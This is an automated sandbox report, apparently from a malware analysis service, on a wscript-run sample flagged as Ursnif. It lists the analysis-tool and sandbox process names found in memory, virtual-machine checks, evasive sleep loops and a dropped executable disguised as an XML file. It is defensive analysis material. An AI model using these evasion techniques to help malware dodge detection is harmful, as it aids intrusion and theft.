Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXEONE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXEN
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXEH
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXEH
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation (4 times)
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mitt.xml
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 6624 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: mitt.xml.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\textual.zip VolumeInformation (8 times)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.270137639.0000024C64CE5000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.261426545.0000024C65B8A000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: regmon.exe
Source: wscript.exe, 00000000.00000003.270159950.0000024C64CF0000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match (the same eight 00000004.00000003.*.0000000005F18000 memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match (the same eight 00000004.00000003.*.0000000005F18000 memory dumps listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)